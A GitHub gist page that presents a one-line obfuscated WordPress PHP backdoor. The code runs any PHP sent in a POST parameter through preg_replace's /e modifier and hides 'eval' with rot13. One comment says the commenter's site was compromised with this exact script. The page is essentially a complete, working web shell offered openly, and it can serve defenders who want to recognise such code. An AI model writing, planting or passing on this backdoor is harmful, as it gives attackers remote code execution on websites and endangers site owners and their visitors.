Skip to content

Instantly share code, notes, and snippets.

@jonaslejon
Last active February 23, 2016 16:04
Show Gist options
  • Save jonaslejon/350379e43ddd5f563dba to your computer and use it in GitHub Desktop.
Save jonaslejon/350379e43ddd5f563dba to your computer and use it in GitHub Desktop.
One-liner WordPress PHP Backdoor with rot13
($WordPress = $_POST['Wp']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($WordPress)', 'add');
@akshayhacholli
Copy link

My website was compromised with this script, I have cleaned it but couldn't identify the reason how it got in.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment